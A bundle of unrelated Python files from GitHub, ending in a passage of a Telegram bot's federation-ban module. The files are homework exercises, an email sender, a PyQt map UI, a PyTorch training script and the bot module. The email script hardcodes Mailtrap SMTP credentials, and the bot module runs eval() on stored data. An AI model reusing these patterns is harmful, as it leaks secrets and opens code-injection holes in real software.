{"seq_id":"3927711976","text":"'''Write a program that takes the coordinates of a point (X and Y) as input, with X ≠ 0 and Y ≠ 0,\nand prints the number of the quadrant of the plane in which the point lies.\n\nExample:\n\n- x=34; y=-30 -> 4\n- x=2; y=4 -> 1\n- x=-34; y=-30 -> 3'''\n\nx = int(input('x = '))\ny = int(input('y = '))\n\nif x == 0 or y == 0:\n    print('Values must not be 0')\nelse:\n    if x > 0:\n        if y > 0:\n            print(\"quadrant 1\")\n        else:\n            print(\"quadrant 4\")\n    else:\n        if y < 0:\n            print(\"quadrant 3\")\n        else:\n            print(\"quadrant 2\")\n","repo_name":"Cos125RUS/Python-Homework","sub_path":"Homework01/Task03.py","file_name":"Task03.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"}
{"seq_id":"34933754850","text":"number_of_pieces = int(input())\npieces = {}\n\nfor nums in range(number_of_pieces):\n    songs = input().split('|')\n    key = songs[0]\n    value = [songs[1], songs[2]]\n    pieces[key] = value\ncommand = input()\nwhile not command == 'Stop':\n    command = command.split('|')\n    act = command[0]\n    piece = command[1]\n    if act == 'Add':\n        composer = command[2]\n        note = command[3]\n        if piece in pieces:\n            print(f'{piece} is already in the collection!')\n        else:\n            pieces[piece] = [composer, note]\n            print(f\"{piece} by {composer} in {note} added to the collection!\")\n\n    elif act == 'Remove':\n        if piece in pieces:\n            removed = pieces.pop(piece)\n            print(f'Successfully removed {piece}!')\n        else:\n            print(f'Invalid operation! {piece} does not exist in the collection.')\n\n    elif act == 'ChangeKey':\n        new_key = command[2]\n        if piece in pieces:\n            pieces[piece][1] = new_key\n            print(f'Changed the key of {piece} to {new_key}!')\n        else:\n            print(f'Invalid operation! {piece} does not exist in the collection.')\n\n    command = input()\n\nsorted_by_name = dict(sorted(pieces.items(), key=lambda x: (x[0], x[0])))\nfor el, digit in sorted_by_name.items():\n    print(f'{el} -> Composer: {digit[0]}, Key: {digit[1]}')","repo_name":"vmakksimov/PythonFundamentals","sub_path":"finalexam/3.The_pianist.py","file_name":"3.The_pianist.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
{"seq_id":"16038716069","text":"#!/usr/bin/env python3\n\nclass TroughObject():\n    def __init__(self, identifier, *args, **options):\n        self.identifier = identifier\n        self.meta = options.get('meta')\n        self.description = options.get('description')\n        self.data = options.get('data')\n        self.parent = options.get('parent')\n\n        self.parent.entries.append(self)\n","repo_name":"aaiknn/beth","sub_path":"utils/trough/TroughObject.py","file_name":"TroughObject.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"}
{"seq_id":"74616683195","text":"import smtplib\nfrom email.mime.text import MIMEText\n\n\nclass enviarMensagens:\n\n    def __init__(self, mensagem):\n        # Keep the message body; it is wrapped in a MIME message on send\n        self.mensagem = mensagem\n\n    def enviar_email(self, email, titulo):\n        self.email = email\n        self.titulo = titulo\n\n        # NOTE: the address parts of these strings were lost in the original source\n        sender = \"Private Person \"\n        receiver = \"A Test User \"\n\n        message = MIMEText(self.mensagem)\n        message[\"Subject\"] = titulo\n        message[\"From\"] = sender\n        message[\"To\"] = receiver\n\n        print(message)\n        with smtplib.SMTP(\"smtp.mailtrap.io\", 2525) as server:\n            server.login(\"e98bc320925dae\", \"eecc4df1afb91f\")\n            server.sendmail(sender, receiver, message.as_string())\n\n\nenvio_email = enviarMensagens('Erro')\nenvio_email.enviar_email(\"A Test User \", \"titulo da mensagem\")\n","repo_name":"AAliSilva/project_python_inicial","sub_path":"script_envioMsg.py","file_name":"script_envioMsg.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
{"seq_id":"2419003872","text":"from PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_MainWindow(object):\n    def setupUi(self, MainWindow):\n        MainWindow.setObjectName(\"MainWindow\")\n        MainWindow.resize(947, 593)\n        self.centralwidget = QtWidgets.QWidget(MainWindow)\n        self.centralwidget.setObjectName(\"centralwidget\")\n        self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\n        self.verticalLayout.setObjectName(\"verticalLayout\")\n        self.horizontalLayout = QtWidgets.QHBoxLayout()\n        self.horizontalLayout.setObjectName(\"horizontalLayout\")\n        self.map_mode = QtWidgets.QComboBox(self.centralwidget)\n        font = QtGui.QFont()\n        font.setPointSize(14)\n        self.map_mode.setFont(font)\n        self.map_mode.setFocusPolicy(QtCore.Qt.NoFocus)\n        self.map_mode.setObjectName(\"map_mode\")\n        self.map_mode.addItem(\"\")\n        self.map_mode.addItem(\"\")\n        self.map_mode.addItem(\"\")\n        self.horizontalLayout.addWidget(self.map_mode)\n        self.reset = QtWidgets.QPushButton(self.centralwidget)\n        font = QtGui.QFont()\n        font.setPointSize(14)\n        self.reset.setFont(font)\n        self.reset.setFocusPolicy(QtCore.Qt.NoFocus)\n        self.reset.setObjectName(\"reset\")\n        self.horizontalLayout.addWidget(self.reset)\n        self.search_line = QtWidgets.QLineEdit(self.centralwidget)\n        self.search_line.setFont(font)\n        self.search_line.setFocusPolicy(QtCore.Qt.ClickFocus)\n        self.search_line.setObjectName(\"search_line\")\n        self.horizontalLayout.addWidget(self.search_line)\n        self.search_button = QtWidgets.QPushButton(self.centralwidget)\n        
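# --- Editorial aside, not part of the original file: a minimal, hypothetical\n        # usage sketch for a pyuic-style Ui class like this one (assumes PyQt5):\n        #\n        #     import sys\n        #     app = QtWidgets.QApplication(sys.argv)\n        #     window = QtWidgets.QMainWindow()\n        #     ui = Ui_MainWindow()\n        #     ui.setupUi(window)\n        #     window.show()\n        #     sys.exit(app.exec_())\n        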
self.search_button.setFont(font)\n self.search_button.setFocusPolicy(QtCore.Qt.NoFocus)\n self.search_button.setObjectName(\"search_button\")\n self.horizontalLayout.addWidget(self.search_button)\n self.verticalLayout.addLayout(self.horizontalLayout)\n self.map_label = QtWidgets.QLabel(self.centralwidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.map_label.sizePolicy().hasHeightForWidth())\n self.map_label.setSizePolicy(sizePolicy)\n self.map_label.setText(\"\")\n self.map_label.setObjectName(\"map_label\")\n self.verticalLayout.addWidget(self.map_label)\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\n self.address = QtWidgets.QLabel(self.centralwidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.address.sizePolicy().hasHeightForWidth())\n self.address.setSizePolicy(sizePolicy)\n self.address.setObjectName(\"address\")\n self.horizontalLayout_2.addWidget(self.address)\n self.pochta_index = QtWidgets.QCheckBox(self.centralwidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.pochta_index.sizePolicy().hasHeightForWidth())\n self.pochta_index.setSizePolicy(sizePolicy)\n self.pochta_index.setObjectName(\"pochta_index\")\n self.horizontalLayout_2.addWidget(self.pochta_index)\n self.verticalLayout.addLayout(self.horizontalLayout_2)\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 947, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n self.address.setFont(font)\n self.pochta_index.setFont(font)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"map\"))\n self.map_mode.setItemText(0, _translate(\"MainWindow\", \"Схема\"))\n self.map_mode.setItemText(1, _translate(\"MainWindow\", \"Гибрид\"))\n self.map_mode.setItemText(2, _translate(\"MainWindow\", \"Спутник\"))\n self.reset.setText(_translate(\"MainWindow\", \"Сброс поискового результата\"))\n self.search_button.setText(_translate(\"MainWindow\", \"Найти\"))\n self.map_label.setText(_translate(\"MainWindow\", \"\"))\n self.pochta_index.setText(_translate(\"MainWindow\", \"Индекс\"))\n","repo_name":"MariaSalimova/YandeMapAPITask","sub_path":"window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":4945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"39005529836","text":"import functools\nimport logging\nimport math\nimport os\nfrom datetime import datetime\n\nimport Abed_utils\n\nimport torch\nimport torch.nn as nn\nfrom torchvision.datasets import ImageFolder\nfrom torch.utils.data import random_split, DataLoader, TensorDataset\nfrom tqdm import trange\n\nif __name__ == 
'__main__':\n\n patch_size = 8\n lr = 1e-3\n epochs = 100\n batch_size = 64\n dropout = 0.5\n hidden_dims = [100, 100, 100]\n\n os.makedirs('./logs/', exist_ok=True)\n\n logfile = f'./logs/trained65{\"_\".join([str(x) for x in hidden_dims]) if hidden_dims else \"_no\"}_hidden_{\"nodropout\" if dropout is None else f\"{dropout}dropout\"}.txt'\n # logfile = f'./logs/tuned_no_hidden.txt'\n weights_file = f'classifier_K19_CE_{epochs}ep_trained65{\"_\".join([str(x) for x in hidden_dims]) if hidden_dims else \"_no\"}_hidden_{\"nodropout\" if dropout is None else f\"{dropout}dropout\"}.pt'\n\n outpath = os.path.join(Abed_utils.OUTPUT_ROOT, 'classifier_weights')\n os.makedirs(outpath, exist_ok=True)\n os.makedirs(os.path.join(Abed_utils.OUTPUT_ROOT, 'classifier_hist'), exist_ok=True)\n\n logging.basicConfig(filename=logfile,\n filemode='a',\n datefmt=Abed_utils.DATETIME_FORMAT,\n level=logging.DEBUG)\n logger = logging.getLogger('Training')\n\n\n device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n logger.debug(f'using {device}')\n\n # backbone = Abed_utils.get_model(patch_size, './ckpts/dino_deitsmall8_pretrain.pth').to(device)\n\n # t = functools.partial(Abed_utils.normalize_input, im_size=224, patch_size=patch_size)\n # ds = ImageFolder(Abed_utils.DATA_ROOT, transform=t, loader=Abed_utils.load_tif_windows)\n features, labels = Abed_utils.load_features(os.path.join(Abed_utils.OUTPUT_ROOT, 'features-k19-trained-65'), device=device)\n\n # Augment with flipped images\n # features_flipped, labels_flipped = Abed_utils.load_features(os.path.join(Abed_utils.OUTPUT_ROOT, 'features_flipped'), cuda=True)\n # features = torch.concat([features, features_flipped], 0)\n # labels = torch.concat([labels, labels_flipped])\n # epochs = epochs//2\n\n train_idx, test_idx = random_split(range(labels.shape[0]),\n [9*labels.shape[0]//10, labels.shape[0] - 9*labels.shape[0]//10])\n\n X_train, y_train = features[train_idx,:], labels[train_idx]\n X_test, y_test = features[test_idx,:], labels[test_idx]\n\n train_loader = DataLoader(TensorDataset(X_train, y_train), batch_size=batch_size, shuffle=True)\n test_loader = DataLoader(TensorDataset(X_test, y_test), batch_size=batch_size, shuffle=True)\n\n model = Abed_utils.ClassificationHead(in_dim=192, dropout=dropout, hidden_dims=hidden_dims)\n\n optimizer = torch.optim.Adam(model.parameters(), lr)\n criterion = nn.CrossEntropyLoss()\n\n train_loss_hist = []\n train_acc_hist = []\n test_loss_hist = []\n test_acc_hist = []\n for epoch in trange(epochs, desc='Training classifier...'):\n train_loss = 0\n train_correct = 0\n test_loss = 0\n test_correct = 0\n model.train()\n for x, y in train_loader:\n optimizer.zero_grad()\n preds = model(x.to(device))\n loss = criterion(preds, y.to(device))\n loss.backward()\n\n with torch.no_grad():\n train_correct += torch.argmax(preds, dim=1).eq(y).byte().sum().item()\n train_loss += loss.item()\n optimizer.step()\n\n with torch.no_grad():\n model.eval()\n for x_t, y_t in test_loader:\n preds = model(x_t.to(device))\n loss = criterion(preds, y_t.to(device))\n test_correct += torch.argmax(preds, dim=1).eq(y_t).byte().sum().item()\n test_loss += loss.item()\n\n train_loss /= len(train_loader)\n train_acc = train_correct / len(train_loader.dataset)\n test_loss /= len(test_loader)\n test_acc = test_correct / len(test_loader.dataset)\n\n train_loss_hist.append(train_loss)\n train_acc_hist.append(train_acc)\n test_loss_hist.append(test_loss)\n test_acc_hist.append(test_acc)\n\n logger.info(f'epoch {epoch+1}, 
train_loss:{train_loss}, train_acc:{train_acc}, val_loss:{test_loss}, val_acc:{test_acc} ')\n\n # torch.save(model.state_dict(), os.path.join(Abed_utils.OUTPUT_ROOT, 'classifier_weights', f'ckpt{epoch}.pt'))\n\n data = {'train_loss': train_loss_hist,\n 'train_acc': train_acc_hist,\n 'test_loss': test_loss_hist,\n 'test_acc': test_acc_hist}\n\n weights_file = os.path.join(os.getcwd(), 'ckpts', weights_file)\n logger.info(f'Saving to {weights_file}')\n torch.save(data, os.path.join(Abed_utils.OUTPUT_ROOT, 'classifier_hist', os.path.basename(logfile).split('.')[0]+'.pt'))\n torch.save(model.state_dict(), weights_file)","repo_name":"aalshabaan/self-supervised-pathology","sub_path":"train_mlp.py","file_name":"train_mlp.py","file_ext":"py","file_size_in_byte":4909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"37738975613","text":"import csv\nimport json\nimport os\nimport re\nimport time\nimport uuid\nfrom io import BytesIO\nfrom typing import Optional\n\nfrom telegram import Chat\nfrom telegram import ChatAction\nfrom telegram import InlineKeyboardButton\nfrom telegram import InlineKeyboardMarkup\nfrom telegram import MessageEntity\nfrom telegram import ParseMode\nfrom telegram import User\nfrom telegram.error import BadRequest\nfrom telegram.error import TelegramError\nfrom telegram.error import Unauthorized\nfrom telegram.ext import CallbackQueryHandler\nfrom telegram.ext import CommandHandler\nfrom telegram.ext import run_async\nfrom telegram.utils.helpers import mention_html\nfrom telegram.utils.helpers import mention_markdown\n\nimport julia.modules.sql.feds_sql as sql\nfrom julia import dispatcher\nfrom julia import LOGGER\nfrom julia import MESSAGE_DUMP\nfrom julia import OWNER_ID\nfrom julia.modules.helper_funcs.alternate import send_action\nfrom julia.modules.helper_funcs.alternate import send_message\nfrom julia.modules.helper_funcs.chat_status import is_user_admin\nfrom julia.modules.helper_funcs.extraction import extract_unt_fedban\nfrom julia.modules.helper_funcs.extraction import extract_user\nfrom julia.modules.helper_funcs.extraction import extract_user_fban\nfrom julia.modules.helper_funcs.string_handling import markdown_parser\n\n# Hello bot owner, I spended for feds many hours of my life, Please don't remove this if you still respect MrYacha and peaktogoo and AyraHikari too\n# Federation by MrYacha 2018-2019\n# Federation rework by Mizukito Akito 2019\n# Federation update v2 by Ayra Hikari 2019\n#\n# Time spended on feds = 10h by #MrYacha\n# Time spended on reworking on the whole feds = 22+ hours by @peaktogoo\n# Time spended on updating version to v2 = 26+ hours by @AyraHikari\n#\n# Total spended for making this features is 68+ hours\n\n# LOGGER.info(\"Original federation module by MrYacha, reworked by Mizukito Akito (@peaktogoo) on Telegram.\")\n\n# TODO: Fix Loads of code duplication\n\nFBAN_ERRORS = {\n \"User is an administrator of the chat\",\n \"Chat not found\",\n \"Not enough rights to restrict/unrestrict chat member\",\n \"User_not_participant\",\n \"Peer_id_invalid\",\n \"Group chat was deactivated\",\n \"Need to be inviter of a user to kick it from a basic group\",\n \"Chat_admin_required\",\n \"Only the creator of a basic group can kick group administrators\",\n \"Channel_private\",\n \"Not in the chat\",\n \"Have no rights to send a message\",\n}\n\nUNFBAN_ERRORS = {\n \"User is an administrator of the chat\",\n \"Chat not found\",\n \"Not enough rights to restrict/unrestrict chat member\",\n 
\"User_not_participant\",\n \"Method is available for supergroup and channel chats only\",\n \"Not in the chat\",\n \"Channel_private\",\n \"Chat_admin_required\",\n \"Have no rights to send a message\",\n}\n\n\n@run_async\ndef new_fed(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n message = update.effective_message\n if chat.type != \"private\":\n update.effective_message.reply_text(\n \"You can your federation in my PM, not in a group.\")\n return\n fednam = message.text.split(None, 1)\n if len(fednam) >= 2:\n fednam = fednam[1]\n fed_id = str(uuid.uuid4())\n fed_name = fednam\n LOGGER.info(fed_id)\n\n # Currently only for creator\n # if fednam == 'Team Nusantara Disciplinary Circle':\n # fed_id = \"TeamNusantaraDevs\"\n\n x = sql.new_fed(user.id, fed_name, fed_id)\n if not x:\n update.effective_message.reply_text(\n \"Can't federate! Please contact my owner @starryboi if the problem persists.\"\n )\n return\n\n update.effective_message.reply_text(\n \"*You have successfully created a new federation!*\"\n \"\\nName: `{}`\"\n \"\\nID: `{}`\"\n \"\\n\\nUse the command below to join the federation:\"\n \"\\n`/joinfed {}`\".format(fed_name, fed_id, fed_id),\n parse_mode=ParseMode.MARKDOWN,\n )\n try:\n context.bot.send_message(\n MESSAGE_DUMP,\n \"Federation {} has been created with ID:
{}
\".\n format(fed_name, fed_id),\n parse_mode=ParseMode.HTML,\n )\n except Exception:\n LOGGER.warning(\"Cannot send a message to MESSAGE_DUMP\")\n else:\n update.effective_message.reply_text(\n \"Please write down the name of the federation\")\n\n\n@run_async\ndef del_fed(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n args = context.args\n if chat.type != \"private\":\n update.effective_message.reply_text(\n \"You can delete your federation in my PM, not in the group.\")\n return\n if args:\n is_fed_id = args[0]\n getinfo = sql.get_fed_info(is_fed_id)\n if getinfo is False:\n update.effective_message.reply_text(\"This federation is not found\")\n return\n if int(getinfo[\"owner\"]) == int(user.id) or int(user.id) == OWNER_ID:\n fed_id = is_fed_id\n else:\n update.effective_message.reply_text(\n \"Only federation owners can do this!\")\n return\n else:\n update.effective_message.reply_text(\"What should I delete?\")\n return\n\n if is_user_fed_owner(fed_id, user.id) is False:\n update.effective_message.reply_text(\n \"Only federation owners can do this!\")\n return\n\n update.effective_message.reply_text(\n \"Are you sure you want to delete your federation? This action cannot be canceled, you will lose your entire ban list, and '{}' will be permanently lost.\"\n .format(getinfo[\"fname\"]),\n reply_markup=InlineKeyboardMarkup([\n [\n InlineKeyboardButton(\n text=\"⚠️ Remove Federation ⚠️\",\n callback_data=\"rmfed_{}\".format(fed_id),\n )\n ],\n [\n InlineKeyboardButton(text=\"Cancel\",\n callback_data=\"rmfed_cancel\")\n ],\n ]),\n )\n\n\n@run_async\ndef fed_chat(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n fed_id = sql.get_fed_id(chat.id)\n\n user_id = update.effective_message.from_user.id\n if not is_user_admin(update.effective_chat, user_id):\n update.effective_message.reply_text(\n \"You must be an admin to execute this command\")\n return\n\n if not fed_id:\n update.effective_message.reply_text(\n \"This group is not in any federation!\")\n return\n\n chat = update.effective_chat # type: Optional[Chat]\n info = sql.get_fed_info(fed_id)\n\n text = \"This chat is part of the following federation:\"\n text += \"\\n{} (ID: {})\".format(info[\"fname\"], fed_id)\n\n update.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n\n\n@run_async\ndef join_fed(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM!\",\n )\n return\n\n message = update.effective_message\n administrators = chat.get_administrators()\n fed_id = sql.get_fed_id(chat.id)\n args = context.args\n\n if str(user.id) in str(OWNER_ID):\n pass\n else:\n for admin in administrators:\n status = admin.status\n if status == \"creator\":\n if str(admin.user.id) == str(user.id):\n pass\n else:\n update.effective_message.reply_text(\n \"Only group creators can use this command!\")\n return\n if fed_id:\n message.reply_text(\"You cannot join two federations from one chat\")\n return\n\n if len(args) >= 1:\n getfed = sql.search_fed_by_id(args[0])\n if getfed is False:\n message.reply_text(\"Please enter a valid federation ID\")\n return\n\n x = sql.chat_join_fed(args[0], chat.title, chat.id)\n if not x:\n message.reply_text(\"Failed to join federation!\")\n return\n\n get_fedlog = sql.get_fed_log(args[0])\n if 
get_fedlog:\n if eval(get_fedlog):\n context.bot.send_message(\n get_fedlog,\n \"Chat *{}* has joined the federation *{}*\".format(\n chat.title, getfed[\"fname\"]),\n parse_mode=\"markdown\",\n )\n\n message.reply_text(\"This chat has joined the federation: {}!\".format(\n getfed[\"fname\"]))\n\n\n@run_async\ndef leave_fed(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n fed_info = sql.get_fed_info(fed_id)\n\n # administrators = chat.get_administrators().status\n getuser = context.bot.get_chat_member(chat.id, user.id).status\n if getuser in \"creator\" or str(user.id) in str(OWNER_ID):\n if sql.chat_leave_fed(chat.id) is True:\n get_fedlog = sql.get_fed_log(fed_id)\n if get_fedlog:\n if eval(get_fedlog):\n context.bot.send_message(\n get_fedlog,\n \"Chat *{}* has left the federation *{}*\".format(\n chat.title, fed_info[\"fname\"]),\n parse_mode=\"markdown\",\n )\n send_message(\n update.effective_message,\n \"This chat has left the federation {}!\".format(\n fed_info[\"fname\"]),\n )\n else:\n update.effective_message.reply_text(\n \"How can you leave a federation that you never joined?!\")\n else:\n update.effective_message.reply_text(\n \"Only group creators can use this command!\")\n\n\n@run_async\ndef user_join_fed(update, context):\n chat = update.effective_chat\n user = update.effective_user\n msg = update.effective_message\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n\n if is_user_fed_owner(fed_id, user.id) or str(user.id) in str(OWNER_ID):\n user_id = extract_user(msg, args)\n if user_id:\n user = context.bot.get_chat(user_id)\n elif not msg.reply_to_message and not args:\n user = msg.from_user\n elif not msg.reply_to_message and (\n not args or\n (len(args) >= 1 and not args[0].startswith(\"@\")\n and not args[0].isdigit()\n and not msg.parse_entities([MessageEntity.TEXT_MENTION]))):\n msg.reply_text(\"I cannot extract user from this message\")\n return\n else:\n LOGGER.warning(\"error\")\n getuser = sql.search_user_in_fed(fed_id, user_id)\n fed_id = sql.get_fed_id(chat.id)\n info = sql.get_fed_info(fed_id)\n get_owner = eval(info[\"fusers\"])[\"owner\"]\n get_owner = context.bot.get_chat(get_owner).id\n if user_id == get_owner:\n update.effective_message.reply_text(\n \"You do know that the user is the federation owner, right? RIGHT?\"\n )\n return\n if getuser:\n update.effective_message.reply_text(\n \"I cannot promote users who are already federation admins! 
But, I can remove them if you want!\"\n )\n return\n if user_id == context.bot.id:\n update.effective_message.reply_text(\n \"I already am a federation admin in all federations!\")\n return\n res = sql.user_join_fed(fed_id, user_id)\n if res:\n update.effective_message.reply_text(\"Successfully Promoted!\")\n else:\n update.effective_message.reply_text(\"Failed to promote!\")\n else:\n update.effective_message.reply_text(\n \"Only federation owners can do this!\")\n\n\n@run_async\ndef user_demote_fed(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n\n if is_user_fed_owner(fed_id, user.id):\n msg = update.effective_message # type: Optional[Message]\n user_id = extract_user(msg, args)\n if user_id:\n user = context.bot.get_chat(user_id)\n\n elif not msg.reply_to_message and not args:\n user = msg.from_user\n\n elif not msg.reply_to_message and (\n not args or\n (len(args) >= 1 and not args[0].startswith(\"@\")\n and not args[0].isdigit()\n and not msg.parse_entities([MessageEntity.TEXT_MENTION]))):\n msg.reply_text(\"I cannot extract user from this message\")\n return\n else:\n LOGGER.warning(\"error\")\n\n if user_id == context.bot.id:\n update.effective_message.reply_text(\n \"The thing you are trying to demote me from will fail to work without me! Just saying.\"\n )\n return\n\n if sql.search_user_in_fed(fed_id, user_id) is False:\n update.effective_message.reply_text(\n \"I cannot demote people who are not federation admins!\")\n return\n\n res = sql.user_demote_fed(fed_id, user_id)\n if res is True:\n update.effective_message.reply_text(\"Get out of here!\")\n else:\n update.effective_message.reply_text(\"Demotion failed!\")\n else:\n update.effective_message.reply_text(\n \"Only federation owners can do this!\")\n return\n\n\n@run_async\ndef fed_info(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n args = context.args\n if args:\n fed_id = args[0]\n info = sql.get_fed_info(fed_id)\n else:\n fed_id = sql.get_fed_id(chat.id)\n if not fed_id:\n send_message(update.effective_message,\n \"This group is not in any federation!\")\n return\n info = sql.get_fed_info(fed_id)\n\n if is_user_fed_admin(fed_id, user.id) is False:\n update.effective_message.reply_text(\n \"Only a federation admin can do this!\")\n return\n\n owner = context.bot.get_chat(info[\"owner\"])\n try:\n owner_name = owner.first_name + \" \" + owner.last_name\n except BaseException:\n owner_name = owner.first_name\n FEDADMIN = sql.all_fed_users(fed_id)\n FEDADMIN.append(int(owner.id))\n TotalAdminFed = len(FEDADMIN)\n\n user = update.effective_user # type: Optional[Chat]\n chat = update.effective_chat # type: Optional[Chat]\n info = sql.get_fed_info(fed_id)\n\n text = \"ℹ️ Federation Information:\"\n text += \"\\nFedID: {}\".format(fed_id)\n text += \"\\nName: {}\".format(info[\"fname\"])\n text += \"\\nCreator: {}\".format(mention_html(owner.id, owner_name))\n text += \"\\nAll Admins: {}\".format(TotalAdminFed)\n getfban = sql.get_all_fban_users(fed_id)\n text += \"\\nTotal banned users: {}\".format(len(getfban))\n getfchat = sql.all_fed_chats(fed_id)\n text += \"\\nNumber of groups in this federation: {}\".format(\n len(getfchat))\n\n 
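# Editorial note (added): \"text\" is sent with ParseMode.HTML just below while\n    # info[\"fname\"] is interpolated unescaped, so a federation name containing\n    # '<' or '&' can break Telegram's HTML parsing. A defensive variant would be\n    # (illustrative assumption, not the author's code):\n    #\n    #     import html\n    #     text += \"\\nName: {}\".format(html.escape(info[\"fname\"]))\n    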
update.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n\n\n@run_async\ndef fed_admin(update, context):\n\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n\n if not fed_id:\n update.effective_message.reply_text(\n \"This group is not in any federation!\")\n return\n\n if is_user_fed_admin(fed_id, user.id) is False:\n update.effective_message.reply_text(\n \"Only federation admins can do this!\")\n return\n\n user = update.effective_user # type: Optional[Chat]\n chat = update.effective_chat # type: Optional[Chat]\n info = sql.get_fed_info(fed_id)\n\n text = \"Federation Admin {}:\\n\\n\".format(info[\"fname\"])\n text += \"👑 Owner:\\n\"\n owner = context.bot.get_chat(info[\"owner\"])\n try:\n owner_name = owner.first_name + \" \" + owner.last_name\n except BaseException:\n owner_name = owner.first_name\n text += \" • {}\\n\".format(mention_html(owner.id, owner_name))\n\n members = sql.all_fed_members(fed_id)\n if len(members) == 0:\n text += \"\\n🔱 There is no admin in this federation\"\n else:\n text += \"\\n🔱 Admin:\\n\"\n for x in members:\n user = context.bot.get_chat(x)\n text += \" • {}\\n\".format(mention_html(user.id, user.first_name))\n\n update.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n\n\n@run_async\ndef fed_ban(update, context):\n\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n\n if not fed_id:\n update.effective_message.reply_text(\n \"This group is not a part of any federation!\")\n return\n\n info = sql.get_fed_info(fed_id)\n getfednotif = sql.user_feds_report(info[\"owner\"])\n\n if is_user_fed_admin(fed_id, user.id) is False:\n update.effective_message.reply_text(\n \"Only federation admins can do this!\")\n return\n\n message = update.effective_message\n\n user_id, reason = extract_unt_fedban(message, args)\n\n fban, fbanreason, fbantime = sql.get_fban_user(fed_id, user_id)\n\n if not user_id:\n message.reply_text(\"You don't seem to be referring to a user\")\n return\n\n if user_id == context.bot.id:\n message.reply_text(\n \"What is funnier than kicking the group creator? 
Self sacrifice.\")\n return\n\n if is_user_fed_owner(fed_id, user_id) is True:\n message.reply_text(\"Why did you try the federation fban?\")\n return\n\n if is_user_fed_admin(fed_id, user_id) is True:\n message.reply_text(\"He is a federation admin, I can't fban him.\")\n return\n\n if user_id == OWNER_ID:\n message.reply_text(\"That's a very STUPID idea!\")\n return\n\n if int(user_id) in OWNER_ID:\n message.reply_text(\"I will not use sudo fban!\")\n return\n\n try:\n user_chat = context.bot.get_chat(user_id)\n isvalid = True\n fban_user_id = user_chat.id\n fban_user_name = user_chat.first_name\n fban_user_lname = user_chat.last_name\n fban_user_uname = user_chat.username\n except BadRequest as excp:\n if not str(user_id).isdigit():\n send_message(update.effective_message, excp.message)\n return\n if len(str(user_id)) != 9:\n send_message(update.effective_message, \"That's so not a user!\")\n return\n isvalid = False\n fban_user_id = int(user_id)\n fban_user_name = \"user({})\".format(user_id)\n fban_user_lname = None\n fban_user_uname = None\n\n if 